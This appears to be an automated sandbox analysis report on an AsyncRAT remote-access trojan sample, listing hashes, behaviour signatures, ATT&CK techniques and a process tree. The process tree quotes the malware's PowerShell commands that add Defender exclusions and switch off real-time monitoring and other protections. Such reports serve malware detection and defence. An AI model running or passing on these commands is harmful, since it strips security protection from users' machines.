Overview

overview

10

Static

static

10

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    141s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    18-06-2024 19:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe

  • Size

    405KB

  • MD5

    c4e10100c5cf7bec2d9d0a1d7203ddb2

  • SHA1

    24a6ecd52fb2165b8563a2853898316851638871

  • SHA256

    fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7

  • SHA512

    ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202

  • SSDEEP

    6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD

Score
10/10
asyncratexecutionpersistencerat

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
    "C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"
    1⤵
    • Adds Run key to start application
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:456
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2860

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    627073ee3ca9676911bee35548eff2b8

    SHA1

    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

    SHA256

    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

    SHA512

    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    b6c336e3b3cb2cd04d42baac1aa4aa0d

    SHA1

    35a943816f3e9cd596e91be92c4bdb1b05a42d88

    SHA256

    4518fb6ffb3f70be78cb243cac94fcf74d9c58d2e7bd8c510ebe696d3f81cb60

    SHA512

    42c4a8f07051ac7c00014ddaa0b0db50bdbcb49a30ae96803e37f3a566c100932367e0a50baead881509ae4a4d49c769513626c5015fe0a02d1d3ae22ca759f4

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    1a9fa92a4f2e2ec9e244d43a6a4f8fb9

    SHA1

    9910190edfaccece1dfcc1d92e357772f5dae8f7

    SHA256

    0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

    SHA512

    5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    aff7ca86b52a86bf9c5d16b12cdd8d49

    SHA1

    90ae519152674c2eb754041e5af2ff016044f4f6

    SHA256

    5212ed877151babb0aa6b10d0258540498be8e572d99ac3f1c6284b7d451d234

    SHA512

    79e9742f80b213e1f04724aa49418da6a94fa861e73daf34ae6bf9bcaeda537f454468b71da47711baff5805bec50900b68429edf7b86fdefccfefa8cb5518de

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    446dd1cf97eaba21cf14d03aebc79f27

    SHA1

    36e4cc7367e0c7b40f4a8ace272941ea46373799

    SHA256

    a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

    SHA512

    a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hau1vt4y.rtr.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • memory/456-1-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/456-2-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/456-72-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/456-0-0x0000000000710000-0x000000000077C000-memory.dmp
    Filesize

    432KB

    Download
  • memory/456-71-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2196-7-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2196-35-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2196-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2196-6-0x000001E083C10000-0x000001E083C32000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2196-3-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
    Filesize

    10.8MB

    Download